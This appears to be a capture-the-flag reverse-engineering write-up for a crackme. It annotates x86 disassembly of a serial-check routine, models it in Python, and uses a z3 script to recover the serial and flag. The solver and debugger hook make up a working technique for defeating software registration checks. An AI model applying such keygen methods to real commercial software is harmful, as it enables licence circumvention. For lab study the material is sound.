; if inp & 2 == 0 {{{
0x0040A231 mov eax, [ebp-4]
0x0040A234 shl eax, 4
0x0040A237 mov ecx, [ebp+8]
0x0040A23A sub ecx, eax
0x0040A23C mov [ebp+8], ecx
0x0040A23F cmp dword ptr [ebp-4], 30h ; '0'
; if inp == 0x30 {{{{
0x0040A245 xor eax, eax
0x0040A247 cmp eax, 79h ; 'y'
0x0040A24D mov eax, [ebp+8]
0x0040A250 or eax, 0F0F0F0F0h
0x0040A255 mov [ebp+8], eax
; }}}} else (inp != 0x30) {{{{ (do nothing) }}}}.
; }}} else (inp & 2 == 2) {{{
0x0040A20B xor eax, eax
0x0040A20D cmp eax, 0
0x0040A213 mov eax, [ebp+8]
0x0040A216 xor eax, 55AA55AAh
0x0040A21B mov [ebp+8], eax
0x0040A21E mov eax, [ebp+8]
0x0040A221 add eax, [ebp-4]
0x0040A224 mov [ebp+8], eax
; }}}.
; }} else (inp >= 0x40) (not num) {{
0x0040A203 mov eax, [ebp-4]
0x0040A25D xor edx, edx
0x0040A25F push 2
0x0040A261 pop ecx
0x0040A262 div ecx
0x0040A264 test edx, edx
; if inp % 2 == 0 {{{
0x0040A26F mov eax, [ebp+8]
0x0040A272 shl eax, 3
0x0040A275 mov ecx, [ebp+8]
0x0040A278 shr ecx, 1Dh
0x0040A27B or eax, ecx
0x0040A27D mov [ebp+8], eax
0x0040A280 mov eax, [ebp+8]
0x0040A283 add eax, 12345678h
; }}} else (inp % 2 == 1) {{{
0x0040A295 mov eax, [ebp+8]
0x0040A298 shr eax, 5
0x0040A29B mov ecx, [ebp+8]
0x0040A29E shl ecx, 1Bh
0x0040A2A1 or eax, ecx
0x0040A2A3 mov [ebp+8], eax
0x0040A2A6 mov eax, [ebp+8]
0x0040A2A9 xor eax, 87654321h
; }}}.
0x0040A288 mov [ebp+8], eax
; }}.
; } else (state & 1 == 1) {
0x0040A2BE mov eax, [ebp+8]
0x0040A2C1 xor eax, [ebp-4]
0x0040A2C4 cmp eax, 80000000h
; if (state ^ inp) & 0x80000000 == 0x80000000 {{
0x0040A2D3 mov eax, [ebp+8]
0x0040A2D6 sub eax, 21524111h
0x0040A2DB mov [ebp+8], eax
0x0040A2DE cmp dword ptr [ebp-4], 60h ; '`'
; if inp < 0x60 {{{ do nothing }}} else (inp >= 0x60) {{{
0x0040A2EB imul eax, [ebp-4], 21h ; '!'
0x0040A2EF xor eax, [ebp+8]
0x0040A2F2 mov [ebp+8], eax
; }}}.
; }} else ((state ^ inp) & 0x80000000 == 0) {{
0x0040A107 xor eax, eax
0x0040A2F9 cmp eax, 9Dh
0x0040A301 cmp dword ptr [ebp-4], 61h ; 'a'
; if inp < 'a' {{{
0x0040A318 cmp dword ptr [ebp-4], 41h ; 'A'
; if inp >= 'A' {{{{
0x0040A31E cmp dword ptr [ebp-4], 5Ah ; 'Z'
; if inp <= 'Z' {{{{{
0x0040A324 mov eax, 1
0x0040A329 inc eax
0x0040A32D mov eax, [ebp+8]
0x0040A330 add eax, [ebp-4]
0x0040A333 mov [ebp+8], eax
0x0040A336 mov eax, [ebp+8]
0x0040A339 and eax, 100h
; if state & 0x100 == 0 {{{{{{ (do nothing) }}}}}} else (state & 0x100 == 0x100) {{{{{{
0x0040A340 xor eax, eax
0x0040A342 cmp eax, 0
0x0040A348 mov eax, [ebp+8]
0x0040A34B xor eax, 13371337h
0x0040A350 mov [ebp+8], eax
; }}}}}}.
; }}}}} else (inp > 'Z') {{{{{
0x0040A107 xor eax, eax
0x0040A357 cmp eax, 0AEh
0x0040A35F imul eax, [ebp+8], 9
0x0040A363 mov [ebp+8], eax
; }}}}}.
; }}}} else (inp < 'A') {{{{
; the same as above inp > 'Z'.
; }}}}.
; }}} else (inp >= 'a') {{{
0x0040A307 cmp dword ptr [ebp-4], 7Ah ; 'z'
; if inp <= 'z' {{{{
0x0040A30D mov eax, [ebp+8]
0x0040A310 sub eax, [ebp-4]
0x0040A313 mov [ebp+8], eax
; }}}} else (inp > 'z') {{{{
; the same as above inp > 'Z'.
; }}}}.
; }}}.
; }}.
; }.

This part is an extremely complex function, equivalent to:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def rol32(num, shift):
    """Rotate the 32-bit value ``num`` left by ``shift`` bits."""
    upper = num << shift
    lower = num >> (0x20 - shift)
    return (upper | lower) & 0xFFFFFFFF


def ror32(num, shift):
    """Rotate the 32-bit value ``num`` right by ``shift`` bits."""
    lower = num >> shift
    upper = num << (0x20 - shift)
    return (lower | upper) & 0xFFFFFFFF


def switch_case(inp, state):
    """First stage of the per-byte transform: mix input byte ``inp`` into the 32-bit ``state``.

    The branch taken depends on the low bit of ``state``, on the value of
    ``inp`` and, for odd states, on bit 31 of ``state ^ inp``.
    """
    mask = 0xFFFFFFFF

    if state & 1:
        # Odd state.
        if (state ^ inp) & 0x80000000:
            state = (state - 0x21524111) & mask
            if inp >= 0x60:
                state ^= (inp * 0x21) & mask
            return state
        if ord("a") <= inp <= ord("z"):
            return (state - inp) & mask
        if ord("A") <= inp <= ord("Z"):
            state = (state + inp) & mask
            if state & 0x100:
                state ^= 0x13371337
            return state
        return (state * 9) & mask

    # Even state.
    if inp >= 0x40:
        if inp & 1:
            return ror32(state, 5) ^ 0x87654321
        return (rol32(state, 3) + 0x12345678) & mask
    if inp & 2:
        return ((state ^ 0x55AA55AA) + inp) & mask
    state = (state - (inp << 4)) & mask
    if inp == 0x30:
        state |= 0xF0F0F0F0
    return state

In the second part, [ebp-0Ch] is the round index and [ebp-10h] is the number of rounds:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
0x0040A0F5      mov eax, 1
0x0040A0FA inc eax
0x0040A231 mov eax, [ebp-4]
0x0040A25D xor edx, edx
0x0040A374 push 5
0x0040A376 pop ecx
0x0040A377 div ecx ; inp % 5
0x0040A379 inc edx
0x0040A37A inc edx ; inp % 5 + 2, this is the amount of round
0x0040A37B mov [ebp-10h], edx
0x0040A37E mov dword ptr [ebp-0Ch], 0
0x0040A387 mov eax, [ebp-0Ch]
0x0040A391 cmp eax, [ebp-10h]
; begin (inp % 5) + 2 rounds:
0x0040A39E mov eax, [ebp+8]
0x0040A3A1 and eax, 80000000h
; if state & 0x80000000 == 0x80000000 {
0x0040A3AF mov eax, [ebp+8]
0x0040A3B2 shl eax, 1
0x0040A3B4 xor eax, 4C11DB7h
; } else (state & 0x80000000 == 0) {
0x0040A3C6 mov eax, [ebp+8]
0x0040A3C9 shl eax, 1
;}.
0x0040A3B9 mov [ebp+8], eax
0x0040A3CE xor eax, eax
0x0040A3D0 cmp eax, 0C4h
0x0040A3D8 mov eax, [ebp-0Ch]
0x0040A3DB and eax, 80000001h
0x0040A3E7 test eax, eax
; if eax == 0 {
0x0040A3EB xor eax, eax
0x0040A3ED cmp eax, 0
0x0040A3F3 mov eax, [ebp+8]
0x0040A3F6 xor eax, [ebp-4]
; } else (eax == 1) {
0x0040A405 imul eax, [ebp-0Ch], 0Ah
0x0040A409 add eax, [ebp+8]
; }.
0x0040A40C mov [ebp+8], eax
0x0040A3D8 mov eax, [ebp-0Ch]
0x0040A3E6 inc eax ; round tag ++
0x0040A5AA mov [ebp-0Ch], eax
0x0040A5AD mov eax, [ebp-0Ch]
0x0040A391 cmp eax, [ebp-10h] ; cmp with round amount
; loop end

This is:

1
2
3
4
5
6
7
8
9
def round_func(inp, state):
    """Second stage: run ``inp % 5 + 2`` shift-and-mix rounds over the 32-bit ``state``.

    Each round shifts ``state`` left by one bit, XORs in 0x4C11DB7 when
    the bit shifted out was set, then XORs ``inp`` on even rounds or adds
    ``10 * round_index`` on odd rounds.
    """
    rounds = inp % 5 + 2
    idx = 0
    while idx < rounds:
        shifted_out = state & 0x80000000
        state = (state << 1) & 0xFFFFFFFF
        if shifted_out:
            state ^= 0x4C11DB7
        if idx % 2:
            state = (state + 10 * idx) & 0xFFFFFFFF
        else:
            state ^= inp
        idx += 1
    return state

Part 3:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
0x0040A39E      mov eax, [ebp+8]
0x0040A5A4 mov [ebp-8], eax
0x0040A5A7 mov eax, [ebp-8]
0x0040A41D shr eax, 10h
0x0040A420 xor eax, [ebp-8]
0x0040A423 mov [ebp-8], eax
0x0040A426 mov eax, [ebp-8]
0x0040A429 shr eax, 8
0x0040A42C xor eax, [ebp-8]
0x0040A42F mov [ebp-8], eax
0x0040A43A mov eax, [ebp-8]
0x0040A43D and eax, 0Fh
0x0040A440 cmp eax, 7
; if eax >= 7 {
0x0040A445 mov eax, 1
0x0040A44A inc eax
0x0040A44E mov eax, [ebp+8]
0x0040A451 not eax
0x0040A453 mov [ebp+8], eax
; } else (eax < 7) {
0x0040A458 cmp dword ptr [ebp+8], 0
; }.
; dword ptr [ebp+8] != 0:
0x0040A46F mov eax, [ebp+8]
0x0040A472 pop edi
0x0040A473 pop esi
0x0040A474 pop ebx
0x0040A475 leave
0x0040A476 retn 8
0x0040A5AA mov [ebp-0Ch], eax; write to [ebp-0Ch]

At the end of this part, the value of [ebp-0Ch] is updated. This part is equivalent to:

1
2
3
4
5
def tail_func(inp, state):
    """Third stage: invert ``state`` when the low nibble of its folded value exceeds 7.

    The fold XORs ``state`` with itself shifted right by 16, then the
    result with itself shifted right by 8. ``inp`` is not used.
    """
    folded = state ^ (state >> 0x10)
    folded ^= folded >> 8
    if (folded & 0xF) <= 7:
        return state
    return ~state & 0xFFFFFFFF

Therefore, we can search for the intermediate variables used during the function. The result: ebp during the function is 0x19F328; [ebp-8] is at 0x19F320 and holds tmp1 of tail_func; [ebp+8] is at 0x19F330 and holds the state in the function. Add them to the mix hook:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def _dump_once(tid=None):
    """Append one snapshot of the buffer at EBX to the dump file and log stack values.

    Reads READ_SIZE bytes from the address held in EBX, zero-pads a short
    read, optionally skips a snapshot identical to the previous one, and
    writes the bytes followed by PAD_SIZE zero bytes to ``g_fp``. After a
    successful write it reads several dwords from fixed stack addresses of
    the debuggee and prints them together with the hit counter.

    :param tid: unused; present so the function can be used as a callback.
    """
    global g_fp, g_last_dump16, g_dump_count

    if MAX_DUMPS and g_dump_count >= MAX_DUMPS:
        return

    try:
        p = ida_dbg.get_reg_val("EBX")
    except Exception as e:
        print(f"[dump] get_reg_val(EBX) failed: {e}")
        return
    # Skip EBX values that are missing or below 0x10000.
    if p is None or p < 0x10000:
        return

    data = dbg_read_mem(p, READ_SIZE)
    if data is None:
        print(f"[dump] failed to read {READ_SIZE} bytes @ EBX=0x{p:08X}")
        return
    if len(data) < READ_SIZE:
        data += b"\x00" * (READ_SIZE - len(data))
    if DEDUP_CONSECUTIVE and g_last_dump16 == data:
        return

    # Stage 1: persist the snapshot. Only real file errors are reported as such.
    out = data + (b"\x00" * PAD_SIZE)
    try:
        g_fp.write(out)
        g_fp.flush()
    except Exception as e:
        print(f"[dump] file write error: {e}")
        return
    g_last_dump16 = data
    g_dump_count += 1

    # Stage 2: log stack values. A failure here no longer masquerades as a
    # file write error, and the snapshot written above is still counted.
    try:
        # NOTE(review): these four dwords are labelled [EBP-0x10~EBP-0x4] in the
        # log line; the frame they belong to is not visible here - confirm.
        ebp_arr = [read_dword_from_target(0x19F354 + 4 * i) for i in range(4)]
        # With ebp at 0x19F328: 0x19F330 is [ebp+8] (state), 0x19F320 is [ebp-8] (tmp1).
        state = read_dword_from_target(0x19F330)
        tail_num = read_dword_from_target(0x19F320) & 0xF
        print(f"[dump] #{g_dump_count} hit 0x{BREAK_EA:08X} | EBX=0x{p:08X} | [EBP-0x10~EBP-0x4] = "+" ".join(f"0x{v:08X}" for v in ebp_arr)+f" | state = 0x{state:08X} | tail_num = {tail_num}")
    except Exception as e:
        print(f"[dump] #{g_dump_count} stack read/log error: {e}")

Combining these three parts, the function applied to each input byte is:

1
2
3
4
5
def byte_func(inp, state):
    """Apply the three per-byte stages in order: switch_case, round_func, tail_func.

    :param inp: current input byte.
    :param state: state before this byte.
    :return: state after this byte.
    """
    after_switch = switch_case(inp, state)
    after_rounds = round_func(inp, after_switch)
    return tail_func(inp, after_rounds)

After this part, and before the next character is loaded, the following code runs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
; Trace between two characters: bump the processed-character count, then run the hash routine at 0x40A4B5.
0x0040A426      mov eax, [ebp-8]
0x0040A435 inc eax ; count of processed characters += 1
0x0040A42F mov [ebp-8], eax
0x0040A0CB mov eax, [ebp-8]
0x0040A0CE and eax, 80000003h ; keep the sign bit and the low two bits of the count
0x0040A0DA test eax, eax ; zero when the count is a multiple of 4, i.e. a 4-character group is complete
0x0040A0EF cmp dword ptr [ebp-8], 13h ; compare the count with 0x13 (19), where the encryption ends
0x0040A107 xor eax, eax
0x0040A109 cmp eax, 0 ; eax was just zeroed, so this comparison is always "equal"
0x0040A10F mov dword ptr [ebp-4], 1
0x0040A06D mov ecx, eax
0x0040A06F call 0x40A4B5
; --- 0x40A4B5: hash routine. ecx is stored in [ebp-4] and dereferenced as an object pointer. ---
0x0040A4B5 push ebp
0x0040A4B6 mov ebp, esp
0x0040A4B8 sub esp, 38h
0x0040A4BB mov [ebp-4], ecx
0x0040A4BE mov eax, [ebp-4]
0x0040A4C1 mov eax, [eax+24h]
0x0040A4C4 mov [ebp-18h], eax ; local copy of the object's field at +24h
0x0040A4C7 mov eax, [ebp-4]
0x0040A4CA mov eax, [eax+28h]
0x0040A4CD mov [ebp-14h], eax ; local copy of the object's field at +28h
0x0040A4D0 mov dword ptr [ebp-8], 0
0x0040A4D7 mov ecx, [ebp-4]
0x0040A4DA call 0x40A479
; --- 0x40A479: read the byte at (field +24h) + (field +28h) - 1, overwrite it with 90h, return the old byte. ---
; NOTE(review): +24h / +28h look like a base address and a length, making this the last byte of a region - confirm.
0x0040A479 push ebp
0x0040A47A mov ebp, esp
0x0040A47C sub esp, 10h
0x0040A47F mov [ebp-8], ecx
0x0040A482 mov byte ptr [ebp-1], 90h ; replacement byte
0x0040A486 mov eax, [ebp-8]
0x0040A489 mov eax, [eax+24h]
0x0040A48C mov ecx, [ebp-8]
0x0040A48F mov ecx, [ecx+28h]
0x0040A492 lea eax, [eax+ecx-1] ; target address = [obj+24h] + [obj+28h] - 1
0x0040A496 mov [ebp-10h], eax
0x0040A499 mov eax, [ebp-10h]
0x0040A49C mov [ebp-0Ch], eax
0x0040A49F mov eax, [ebp-0Ch]
0x0040A4A2 mov al, [eax]
0x0040A4A4 mov [ebp-2], al ; remember the byte currently stored at the target address
0x0040A4A7 mov eax, [ebp-0Ch]
0x0040A4AA mov cl, [ebp-1]
0x0040A4AD mov [eax], cl ; write 90h over it
0x0040A4AF movzx eax, byte ptr [ebp-2] ; return the old byte
0x0040A4B3 leave
0x0040A4B4 retn
; --- back in 0x40A4B5 ---
0x0040A4DF mov [ebp-38h], al ; keep the old byte; it is passed to 0x40A58B at the end
0x0040A4E2 call sub_40113E ; hash funcs; the result is used as ecx for the next call
0x0040A4E7 mov [ebp-10h], eax
0x0040A4EA mov eax, [ebp-4]
0x0040A4ED mov eax, [eax]
0x0040A4EF mov [ebp-0Ch], eax ; first dword of the object
0x0040A4F2 lea eax, [ebp-8]
0x0040A4F5 push eax
0x0040A4F6 push 0
0x0040A4F8 push 0
0x0040A4FA push 800Ch
0x0040A4FF push dword ptr [ebp-0Ch]
0x0040A502 mov ecx, [ebp-10h]
; Arguments: ([ebp-0Ch], 800Ch, 0, 0, &[ebp-8]).
; NOTE(review): 800Ch is CALG_SHA_256 in the Windows CryptoAPI, so this is presumably CryptCreateHash - confirm.
0x0040A505 call sub_401022
0x0040A50A test eax, eax
0x0040A513 mov [ebp-20h], eax
0x0040A516 mov eax, [ebp-8]
0x0040A519 mov [ebp-1Ch], eax
0x0040A51C push 0
0x0040A51E push dword ptr [ebp-14h]
0x0040A521 push dword ptr [ebp-18h]
0x0040A524 push dword ptr [ebp-1Ch]
0x0040A527 mov ecx, [ebp-20h]
; Arguments: ([ebp-8] value, field +24h, field +28h, 0).
; NOTE(review): presumably CryptHashData(hash, data, length, 0) - confirm.
0x0040A52A call sub_40108E
0x0040A52F test eax, eax
0x0040A533 mov dword ptr [ebp-24h], 20h ; 20h = 32 (' '); its address is passed to sub_40107C below
0x0040A53A call sub_40113E
0x0040A53F mov [ebp-2Ch], eax
0x0040A542 mov eax, [ebp-8]
0x0040A545 mov [ebp-28h], eax
0x0040A548 push 0
0x0040A54A lea eax, [ebp-24h]
0x0040A54D push eax
0x0040A54E mov eax, [ebp-4]
0x0040A551 add eax, 4
0x0040A554 push eax
0x0040A555 push 2
0x0040A557 push dword ptr [ebp-28h]
0x0040A55A mov ecx, [ebp-2Ch]
; Arguments: ([ebp-8] value, 2, object+4, &[ebp-24h], 0).
; NOTE(review): presumably CryptGetHashParam with HP_HASHVAL (2), storing a 32-byte digest at object+4 - confirm.
0x0040A55D call sub_40107C
0x0040A562 nop
0x0040A563 call sub_40113E
0x0040A568 mov [ebp-34h], eax
0x0040A56B mov eax, [ebp-8]
0x0040A56E mov [ebp-30h], eax
0x0040A571 push dword ptr [ebp-30h]
0x0040A574 mov ecx, [ebp-34h]
; Argument: ([ebp-8] value). NOTE(review): presumably CryptDestroyHash - confirm.
0x0040A577 call sub_401058
0x0040A57C nop
0x0040A57D push dword ptr [ebp-38h] ; the byte saved from 0x40A479
0x0040A580 mov ecx, [ebp-4]
0x0040A583 call 0x40A58B
; --- 0x40A58B: write the byte argument to (field +24h) + (field +28h) - 1, the address 0x40A479 overwrote. ---
0x0040A58B push ebp
0x0040A58C mov ebp, esp
0x0040A58E sub esp, 0Ch
0x0040A591 mov [ebp-4], ecx
0x0040A594 mov eax, [ebp-4]
0x0040A597 mov eax, [eax+24h]
0x0040A59A mov ecx, [ebp-4]
0x0040A59D mov ecx, [ecx+28h]
0x0040A5A0 lea eax, [eax+ecx-1] ; same target address as in 0x40A479
0x0040A5A4 mov [ebp-8], eax
0x0040A5A7 mov eax, [ebp-8]
0x0040A5AA mov [ebp-0Ch], eax
0x0040A5AD mov eax, [ebp-0Ch]
0x0040A5B0 mov cl, [ebp+8]
0x0040A5B3 mov [eax], cl ; put the saved byte back
0x0040A5B5 leave
0x0040A5B6 retn 4
; --- back in 0x40A4B5, then return to the caller ---
0x0040A588 nop
0x0040A589 leave
0x0040A58A retn
0x0040A107 xor eax, eax
0x0040A109 cmp eax, 0 ; always "equal" again (eax was just zeroed)
0x0040A07C cmp dword ptr [ebp-4], 0
0x0040A096 cmp dword ptr [ebp-4], 1 ; [ebp-4] was set to 1 before the call above
0x0040A0A4 mov eax, [ebp-8]
0x0040A0A7 mov ecx, [ebp+8]

This code is mainly used for hash verification and can be ignored. Then, after every 4 bytes have been processed:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
; Trace after each completed 4-character group: compare the state with the expected dword, then reseed the state.
0x0040A124      cdq
0x0040A125 and edx, 3 ; edx = 3 if eax is negative, else 0: rounding bias for a signed divide by 4 (not index & 3)
0x0040A128 add eax, edx
0x0040A12A sar eax, 2 ; eax = index / 4
0x0040A12D dec eax ; index//4 - 1
0x0040A12E mov [ebp-18h], eax
0x0040A131 mov eax, [ebp-18h]
0x0040A134 mov ecx, [ebp-14h]
0x0040A137 mov eax, [ecx+eax*4] ; pick one of the 5 dwords loaded from 0x40A000 (table pointer in [ebp-14h])
0x0040A13A mov [ebp-1Ch], eax
0x0040A13D mov eax, 1
0x0040A142 inc eax ; these two writes to eax are overwritten by the next load
0x0040A146 mov eax, [ebp-0Ch]
0x0040A149 xor eax, [ebp-1Ch] ; state xor expected dword: zero only when they match
0x0040A14C mov ecx, [ebp-10h]
0x0040A14F or ecx, eax
0x0040A151 mov [ebp-10h], ecx ; accumulate the bit differences of all groups in [ebp-10h]
0x0040A154 xor eax, eax
0x0040A156 cmp eax, 48h ; 'H' - eax was just zeroed, so this comparison is never "equal"
0x0040A15C imul eax, [ebp-8], 112233h
0x0040A163 sub eax, 35014542h ; reseed: state = count*0x112233 - 0x35014542; -0x35014542 is 0xCAFEBABE modulo 2^32
0x0040A168 mov [ebp-0Ch], eax
0x0040A16B mov dword ptr [ebp-4], 1
0x0040A06D mov ecx, eax
...

Therefore, the encryption process is:

1
2
3
4
5
6
7
8
9
10
# Reference model of the check: the serial is processed in groups of up to
# four bytes, and each group yields one 32-bit value.
sn = bytearray(b"1234567890123456789")
cip = []
for l in range(0, len(sn), 4):
    # Every group starts from a seed derived from its byte offset.
    state = (l * 0x112233 - 0x35014542) & 0xFFFFFFFF
    for ch in sn[l:l+4]:
        state = byte_func(ch, state)
    cip.append(state)

# Expected values; the assertion holds only when sn encrypts to exactly these dwords.
enc = [0x865DBB47, 0x0A6EB190, 0x20476C33, 0x1C8A7693, 0x59FEBDFB]
assert cip == enc

Each dword depends only on its own group of input bytes, so each group can be solved independently with z3:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
# -*- coding: utf-8 -*-
from z3 import *

# Thin wrappers around z3 so the model below reads like the original 32-bit code.

def BV32(x):
    """Return a 32-bit bit-vector constant holding the low 32 bits of ``x``."""
    return BitVecVal(x & 0xFFFFFFFF, 32)


def BV8(x):
    """Return an 8-bit bit-vector constant holding the low 8 bits of ``x``."""
    return BitVecVal(x & 0xFF, 8)


def zext8_to_32(b8):
    """Zero-extend ``b8`` by 24 bits."""
    return ZeroExt(24, b8)


def rol32(x, sh):
    """Rotate ``x`` left by ``sh`` bits."""
    return RotateLeft(x, sh)


def ror32(x, sh):
    """Rotate ``x`` right by ``sh`` bits."""
    return RotateRight(x, sh)


# Unsigned comparisons; the 32 and 8 suffixes only document the intended operand width.

def ULT32(a, b):
    return ULT(a, b)


def ULE32(a, b):
    return ULE(a, b)


def UGT32(a, b):
    return UGT(a, b)


def UGE32(a, b):
    return UGE(a, b)


def ULT8(a, b):
    return ULT(a, b)


def ULE8(a, b):
    return ULE(a, b)


def UGT8(a, b):
    return UGT(a, b)


def UGE8(a, b):
    return UGE(a, b)

def switch_case(inp8, state32):
    """Symbolic model of the first per-byte stage (the branchy dispatcher).

    Every candidate result is built unconditionally and the final value is
    selected with nested ``If`` terms, so the function works on symbolic
    operands.

    :param inp8: 8-bit bit-vector, the input byte.
    :param state32: 32-bit bit-vector, the state before this stage.
    :return: 32-bit bit-vector, the state after this stage.
    """
    mask = BV32(0xFFFFFFFF)
    zero32 = BV32(0)
    inp32 = zext8_to_32(inp8)

    # ---- state has bit 0 clear ----
    # inp < 0x40, bit 1 of inp clear: subtract inp * 16, then OR a pattern in when inp == 0x30
    sub_shifted = (state32 - (inp32 << 4)) & mask
    sub_shifted = If(inp8 == BV8(0x30), sub_shifted | BV32(0xF0F0F0F0), sub_shifted)
    # inp < 0x40, bit 1 of inp set
    xor_add = ((state32 ^ BV32(0x55AA55AA)) + inp32) & mask
    # inp >= 0x40, even / odd
    rol_add = (rol32(state32, 3) + BV32(0x12345678)) & mask
    ror_xor = (ror32(state32, 5) ^ BV32(0x87654321)) & mask

    low_inp = If((inp8 & BV8(2)) == BV8(0), sub_shifted, xor_add)
    high_inp = If((inp8 & BV8(1)) == BV8(0), rol_add, ror_xor)
    when_lsb_clear = If(ULT8(inp8, BV8(0x40)), low_inp, high_inp)

    # ---- state has bit 0 set ----
    # inp32 is zero-extended, so bit 31 of (state32 ^ inp32) is bit 31 of state32.
    top_bits_equal = ((state32 ^ inp32) & BV32(0x80000000)) == zero32

    minus_inp = (state32 - inp32) & mask
    plus_inp = (state32 + inp32) & mask
    plus_inp = If((plus_inp & BV32(0x100)) == BV32(0x100), plus_inp ^ BV32(0x13371337), plus_inp)
    times_nine = (state32 * BV32(9)) & mask

    is_lower = And(UGE8(inp8, BV8(ord("a"))), ULE8(inp8, BV8(ord("z"))))
    is_upper = And(UGE8(inp8, BV8(ord("A"))), ULE8(inp8, BV8(ord("Z"))))
    by_char_class = If(is_lower, minus_inp, If(is_upper, plus_inp, times_nine))

    minus_const = (state32 - BV32(0x21524111)) & mask
    minus_const = If(
        UGE8(inp8, BV8(0x60)),
        minus_const ^ ((inp32 * BV32(0x21)) & mask),
        minus_const,
    )
    when_lsb_set = If(top_bits_equal, by_char_class, minus_const)

    return If((state32 & BV32(1)) == zero32, when_lsb_clear, when_lsb_set)

def round_func(inp8, state32):
    """Symbolic model of the per-byte round loop.

    The round count is ``inp % 5 + 2``, which is symbolic. The loop is
    therefore unrolled six times, and each round's result is kept only
    when its index is below the round count.

    :param inp8: 8-bit bit-vector, the input byte.
    :param state32: 32-bit bit-vector, the state before the loop.
    :return: 32-bit bit-vector, the state after the loop.
    """
    mask = BV32(0xFFFFFFFF)
    inp32 = zext8_to_32(inp8)
    round_num = URem(inp32, BV32(5)) + BV32(2)

    st = state32
    for i in range(6):
        top_bit = st & BV32(0x80000000)
        stepped = (st << 1) & mask
        stepped = If(top_bit != BV32(0), stepped ^ BV32(0x04C11DB7), stepped)
        # The round index is a plain Python int, so parity is decided while building the term.
        if i % 2:
            stepped = (stepped + BV32(i * 10)) & mask
        else:
            stepped = stepped ^ inp32
        st = If(ULT32(BV32(i), round_num), stepped, st)
    return st

def tail_func(inp8, state32):
    """Symbolic model of the conditional inversion step.

    The state is XOR-folded with logical right shifts by 16 and 8; when the
    low nibble of the folded value is greater than 7 (unsigned), the
    complemented state is selected.

    :param inp8: 8-bit bit-vector, the input byte (not used by this step).
    :param state32: 32-bit bit-vector, the state to test.
    :return: 32-bit bit-vector, ``state32`` or its complement.
    """
    folded = LShR(state32, 16) ^ state32
    folded = LShR(folded, 8) ^ folded
    inverted = (~state32) & BV32(0xFFFFFFFF)
    return If(UGT32(folded & BV32(0xF), BV32(7)), inverted, state32)

def byte_func(inp8, state32):
    """Chain the three symbolic stages for one input byte.

    :param inp8: 8-bit bit-vector, the input byte.
    :param state32: 32-bit bit-vector, the state before this byte.
    :return: 32-bit bit-vector, the state after this byte.
    """
    after_switch = switch_case(inp8, state32)
    after_rounds = round_func(inp8, after_switch)
    return tail_func(inp8, after_rounds)

def main():
    """Recover the serial by solving each group of input bytes on its own.

    Every expected dword depends only on the bytes of its own group and on
    a seed derived from the group's position. Each group therefore gets a
    fresh solver over its bytes, restricted to printable ASCII. The serial
    has 19 characters: four groups of 4 bytes and a final group of 3.

    Prints one line per group and finally the assembled serial. A group
    without a solution is reported and filled with ``?`` so that the
    remaining characters keep their positions.
    """
    enc = [0x865DBB47, 0x0A6EB190, 0x20476C33, 0x1C8A7693, 0x59FEBDFB]
    group_sizes = [4, 4, 4, 4, 3]
    sn = bytearray()

    for i, (size, expected) in enumerate(zip(group_sizes, enc)):
        bs = [BitVec(f"b{k}", 8) for k in range(size)]
        s = Solver()
        for b in bs:
            # Unsigned bounds: >= and <= on z3 bit-vectors are signed comparisons.
            s.add(And(UGE(b, 0x20), ULE(b, 0x7e)))

        # Seed for group i: 0xCAFEBABE plus (number of bytes before the group) * 0x112233.
        state = BV32(0xCAFEBABE + i * 4 * 0x112233)
        for b in bs:
            state = byte_func(b, state)
        s.add(state == BV32(expected))

        if s.check() != sat:
            print(f"[{i}] no printable solution found")
            sn += b"?" * size
            continue

        m = s.model()
        sol = [m.eval(b, model_completion=True).as_long() for b in bs]
        print(f"[{i}] bytes = {sol} hex = {bytes(sol).hex()} ascii = {bytes(sol)}")
        sn += bytearray(sol)

    # decode must be called; printing sn.decode shows the bound method instead of the serial.
    print(sn.decode())

if __name__ == "__main__":
    main()

The recovered input (serial) is D3FE-A7ED-BAAD-C0D3.

CMO{byp4ss3d_f4tm1k3_2o26}